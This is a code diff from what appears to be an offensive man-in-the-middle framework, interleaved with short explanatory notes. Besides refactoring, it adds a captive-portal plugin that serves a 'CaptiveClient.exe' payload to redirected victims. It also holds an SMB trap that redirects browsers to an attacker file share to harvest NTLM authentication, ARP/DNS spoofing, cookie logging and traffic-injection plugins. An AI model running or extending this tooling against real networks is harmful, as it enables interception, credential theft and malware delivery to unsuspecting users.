+data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data) #append to body
-f.close()
 # add manifest reference
 data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data)
@@ -154,9 +151,8 @@ class AppCachePlugin(Plugin):
 if not os.path.exists(p+'.manifest'):
 p = self.getDefaultTemplatePrefix()
-f = open(p + '.manifest', 'r')
+with open(p + '.manifest', 'r') as f:
 manifest = f.read()
-f.close()
 return self.decorate(manifest, section)
 def decorate(self, content, section):
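These hunks are the file-reading refactor: every open()/read()/close() triple becomes a with-statement. A standalone sketch of the pattern (the template path is hypothetical and assumed to exist):

```
# Old pattern used throughout the plugin: the close() is skipped if read() raises
f = open('template.replace', 'r')
data = f.read()
f.close()

# New pattern: the context manager closes the file even on exceptions
with open('template.replace', 'r') as f:
    data = f.read()
```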

plugins/captive.py (new executable file, 149 lines)

@@ -0,0 +1,149 @@
# Copyright (c) 2014-2016 Oliver Nettinger, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# note: portal.html has been adapted from
# config/responder/AccessDenied.html for now
from plugins.plugin import Plugin
from urlparse import urlparse
class Captive(Plugin):
    name = "Captive Portal"
    optname = "captive"
    tree_info = ["Captive Portal online"]
    desc = "Be a captive portal!"
    version = "0.1"

    def initialize(self, options):
        self.options = options
        from core.utils import shutdown

        if options.portalurl:
            self.portalurl = options.portalurl
        else:
            # self.options.ip is prefilled earlier
            self.hostname = 'captive.portal' if self.options.usedns else self.options.ip
            if options.portaldir:
                self.serve_dir(options.portaldir)
            else:
                self.serve_portal()

    def response(self, response, request, data):
        if urlparse(self.portalurl).hostname not in request.headers['host']:
            self.clientlog.info("Redirecting to captive portal {}".format(self.portalurl), extra=request.clientInfo)
            response.headers = {}
            data = '''<html>
<body>
<p>Please click <a href="{}">here</a> if you are not redirected automatically</p>
</body></html>
'''.format(self.portalurl)
            response.redirect(self.portalurl)
        return {'response': response, 'request':request, 'data': data}

    def options(self, options):
        ''' captive can be either run redirecting to a specified url (--portalurl), serve the payload locally (no argument) or
        start an instance of SimpleHTTPServer to serve the LOCALDIR (--portaldir) '''
        group = options.add_mutually_exclusive_group(required=False)
        group.add_argument('--portalurl', dest='portalurl', metavar="URL", help='Specify the URL where the portal is located, e.g. http://example.com.')
        group.add_argument('--portaldir', dest='portaldir', metavar="LOCALDIR", help='Specify a local path containg the portal files served with a SimpleHTTPServer on a different port (see config).')
        options.add_argument('--use-dns', dest='usedns', action='store_true', help='Whether we use dns spoofing to serve from a fancier portal URL captive.portal when used without options or portaldir. Requires DNS for "captive.portal" to resolve, e.g. via configured dns spoofing --dns.')

    def on_shutdown(self):
        '''This will be called when shutting down'''
        pass

    def serve_portal(self):
        self.portalurl = 'http://{}/portal.html'.format(self.hostname)
        from core.servers.HTTP import HTTP
        HTTP.add_static_endpoint('portal.html','text/html', './config/captive/portal.html')
        HTTP.add_static_endpoint('CaptiveClient.exe','application/octet-stream', self.config['Captive']['PayloadFilename'])
        self.tree_info.append("Portal login served by built-in HTTP server.")

    def serve_dir(self, dir):
        import threading
        import posixpath
        import urllib
        import os
        from SimpleHTTPServer import SimpleHTTPRequestHandler
        from BaseHTTPServer import HTTPServer as ServerClass

        Protocol = "HTTP/1.0"
        port = self.config['Captive']['Port']
        ServerString = self.config['Captive']['ServerString']
        self.portalurl = "http://{}:{}/".format(self.hostname, port)

        ROUTES = (['', dir],)

        class HandlerClass(SimpleHTTPRequestHandler):
            '''HandlerClass adapted from https://gist.github.com/creativeaura/5546779'''

            def translate_path(self, path):
                '''translate path given routes'''

                # set default root to cwd
                root = os.getcwd()

                # look up routes and set root directory accordingly
                for pattern, rootdir in ROUTES:
                    if path.startswith(pattern):
                        # found match!
                        path = path[len(pattern):]  # consume path up to pattern len
                        root = rootdir
                        break

                # normalize path and prepend root directory
                path = path.split('?',1)[0]
                path = path.split('#',1)[0]
                path = posixpath.normpath(urllib.unquote(path))
                words = path.split('/')
                words = filter(None, words)

                path = root
                for word in words:
                    drive, word = os.path.splitdrive(word)
                    head, word = os.path.split(word)
                    if word in (os.curdir, os.pardir):
                        continue
                    path = os.path.join(path, word)

                return path

        server_address = ('0.0.0.0', int(port))
        HandlerClass.protocol_version = Protocol
        HandlerClass.server_version = ServerString

        httpd = ServerClass(server_address, HandlerClass)
        ServerClass.path = dir

        sa = httpd.socket.getsockname()

        try:
            t = threading.Thread(name='PortalServer', target=httpd.serve_forever)
            t.setDaemon(True)
            t.start()
            self.tree_info.append("Portal Server instance running on port {} serving {}".format(port, dir))
        except Exception as e:
            shutdown("Failed to start Portal Server")
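One detail worth calling out in the new plugin: the hostname check in response() is what stops clients that already reached the portal from being redirected in a loop. A small sketch of that check in isolation (the URL and Host header values are made up):

```
from urlparse import urlparse   # Python 2, as in the plugin

portalurl = 'http://captive.portal/portal.html'          # hypothetical portal URL

for host_header in ['example.com', 'captive.portal']:
    if urlparse(portalurl).hostname not in host_header:
        print "{} -> redirect to {}".format(host_header, portalurl)
    else:
        print "{} -> already on the portal, leave the response alone".format(host_header)
```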


@@ -45,7 +45,6 @@ class FerretNG(Plugin):
 with open(options.cookie_file, 'r') as cookie_file:
 self.cookie_file = json.dumps(cookie_file.read())
 URLMonitor.getInstance().cookies = self.cookie_file
-cookie_file.close()
 except Exception as e:
 shutdown("[-] Error loading cookie log file: {}".format(e))
@@ -94,4 +93,3 @@ class FerretNG(Plugin):
 self.log.info("Writing cookies to log file")
 with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
 cookie_file.write(str(URLMonitor.getInstance().cookies))
-cookie_file.close()


@@ -611,14 +611,14 @@ class FilePwn(Plugin):
 def response(self, response, request, data):
-content_header = response.headers['content-type']
+content_header = response.responseHeaders.getRawHeaders('Content-Type')[0]
 client_ip = request.client.getClientIP()
 host = request.headers['host']
-try:
-content_length = int(response.headers['content-length'])
-except KeyError:
+if not response.responseHeaders.hasHeader('content-length'):
 content_length = None
+else:
+content_length = int(response.responseHeaders.getRawHeaders('content-length')[0])
 for target in self.user_config['targets'].keys():
 if target == 'ALL':
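This and the following plugin changes move from the old dict-style response.headers lookups to Twisted's Headers object. A minimal sketch of that API, assuming Twisted is installed (the header values are made up):

```
from twisted.web.http_headers import Headers

headers = Headers({'Content-Type': ['text/html'], 'Content-Length': ['42']})

# Lookups are case-insensitive and getRawHeaders() returns a list of raw values
content_type = headers.getRawHeaders('content-type')[0]

# hasHeader() replaces the old try/except KeyError guard
if not headers.hasHeader('content-length'):
    content_length = None
else:
    content_length = int(headers.getRawHeaders('content-length')[0])

print content_type, content_length
```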


@@ -0,0 +1,57 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import random
import os
from plugins.plugin import Plugin
class ImageRandomizer(Plugin):
    name = "ImageRandomizer"
    optname = "imgrand"
    desc = 'Replaces images with a random one from a specified directory'
    version = "0.1"

    def initialize(self, options):
        self.options = options
        self.img_dir = options.img_dir

    def responseheaders(self, response, request):
        '''Kill the image skipping that's in place for speed reasons'''
        if request.isImageRequest:
            request.isImageRequest = False
            request.isImage = True
            self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper()

    def response(self, response, request, data):
        try:
            isImage = getattr(request, 'isImage')
        except AttributeError:
            isImage = False

        if isImage:
            try:
                img = random.choice(os.listdir(self.options.img_dir))
                with open(os.path.join(self.options.img_dir, img), 'rb') as img_file:
                    data = img_file.read()
                self.clientlog.info("Replaced image with {}".format(img), extra=request.clientInfo)
                return {'response': response, 'request': request, 'data': data}
            except Exception as e:
                self.clientlog.info("Error: {}".format(e), extra=request.clientInfo)

    def options(self, options):
        options.add_argument("--img-dir", type=str, metavar="DIRECTORY", help="Directory with images")
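As a usage note, the plugin picks any entry from --img-dir at random; a hedged sketch of the same selection with an extension filter added on top (the directory path and extension list are assumptions, not part of the plugin):

```
import os
import random

img_dir = './images'    # hypothetical --img-dir value
candidates = [f for f in os.listdir(img_dir)
              if f.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))]

if candidates:
    img = random.choice(candidates)
    with open(os.path.join(img_dir, img), 'rb') as img_file:
        data = img_file.read()
    print "would serve {} ({} bytes) instead of the original image".format(img, len(data))
```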


@@ -61,10 +61,13 @@ class Inject(Plugin):
 ip = response.getClientIP()
 hn = response.getRequestHostname()
-try:
-mime = response.headers['Content-Type']
-except KeyError:
-return
+if not response.responseHeaders.hasHeader('Content-Type'):
+return {'response': response, 'request':request, 'data': data}
+mime = response.responseHeaders.getRawHeaders('Content-Type')[0]
+if "text/html" not in mime:
+return {'response': response, 'request':request, 'data': data}
 if "charset" in mime:
 match = re.search('charset=(.*)', mime)
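The charset branch that follows the new header guard pulls the encoding straight out of the Content-Type value; a tiny self-contained sketch (the MIME string is an example value):

```
import re

mime = 'text/html; charset=utf-8'    # example Content-Type value
match = re.search('charset=(.*)', mime)
if match:
    print match.group(1)             # -> utf-8
```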


@@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):
 def __init__(self, parser):
 '''Passed the options namespace'''
 if self.desc:
 sgroup = parser.add_argument_group(self.name, self.desc)
 else:


@@ -35,7 +35,7 @@ class Replace(Plugin):
 self.options = options
 def response(self, response, request, data):
-mime = response.headers['Content-Type']
+mime = response.responseHeaders.getRawHeaders('Content-Type')[0]
 hn = response.getRequestHostname()
 if "text/html" in mime:


@@ -91,5 +91,5 @@ class Responder(Plugin):
 options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
 options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
 options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
-options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
+options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
-options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
+options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")


@@ -46,7 +46,6 @@ class ScreenShotter(Inject, Plugin):
 try:
 with open('./logs/' + img_file, 'wb') as img:
 img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1]))
-img.close()
 self.clientlog.info('Saved screenshot to {}'.format(img_file), extra=request.clientInfo)
 except Exception as e:


@@ -33,6 +33,6 @@ class SMBTrap(Plugin):
 return {"request": request, "version": version, "code": 302, "message": "Found"}
 def responseheaders(self, response, request):
-self.clientlog.info("Trapping request to {}".format(request.headers['host']))
+self.clientlog.info("Trapping request to {}".format(request.headers['host']), extra=request.clientInfo)
 rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8))
-response.headers["Location"] = "file://{}/{}".format(self.ip, rand_path)
+response.responseHeaders.setRawHeaders('Location', ["file://{}/{}".format(self.ip, rand_path)])
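The trap redirects the browser to a bogus file:// share so the client attempts SMB authentication against the attacker; a minimal sketch of how the Location value is built (the IP is a placeholder for self.ip):

```
import random
import string

ip = '192.168.1.100'    # placeholder for self.ip
rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8))
print "file://{}/{}".format(ip, rand_path)    # e.g. file://192.168.1.100/K3R9TQ2A
```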


@@ -70,7 +70,7 @@ class Spoof(Plugin):
 if options.dns:
 self.tree_info.append('DNS spoofing enabled')
-if iptables().dns is False:
+if iptables().dns is False and options.filter is None:
 iptables().DNS(self.config['MITMf']['DNS']['port'])
 if not options.arp and not options.icmp and not options.dhcp and not options.dns:
@@ -78,7 +78,7 @@ class Spoof(Plugin):
 set_ip_forwarding(1)
-if iptables().http is False:
+if iptables().http is False and options.filter is None:
 iptables().HTTP(options.listen_port)
 for protocol in self.protocol_instances:
@@ -96,7 +96,7 @@ class Spoof(Plugin):
 options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
 options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
 options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
-options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
+options.add_argument('--arpmode', type=str, dest='arpmode', default='rep', choices=["rep", "req"], help='ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
 def on_shutdown(self):
 from core.utils import iptables, set_ip_forwarding


@@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
 from core.servers.DNS import DNSChef
 from core.utils import iptables
-if iptables().dns is False:
+if iptables().dns is False and options.filter is False:
 iptables().DNS(self.config['MITMf']['DNS']['port'])
 URLMonitor.getInstance().setHstsBypass()


@@ -34,7 +34,7 @@ class Upsidedownternet(Plugin):
 if request.isImageRequest:
 request.isImageRequest = False
 request.isImage = True
-self.imageType = response.headers['content-type'].split('/')[1].upper()
+self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper()
 def response(self, response, request, data):
 try:


@@ -1,4 +1,4 @@
-git+git://github.com/kti/python-netfilterqueue
+git+https://github.com/kti/python-netfilterqueue
 pyinotify
 pycrypto
 pyasn1


@@ -1,3 +0,0 @@
-#!/usr/bin/env bash
-git submodule init && git submodule update --recursive


@@ -24,7 +24,7 @@ class BasicTests(unittest.TestCase):
 from core.logger import logger
 logger.log_level = logging.DEBUG
 from core.netcreds import NetCreds
-NetCreds().start('venet0:0', '172.30.96.18', None)
+NetCreds().start('venet0:0', '172.30.96.18')
 def test_SSLStrip_Proxy(self):
 favicon = True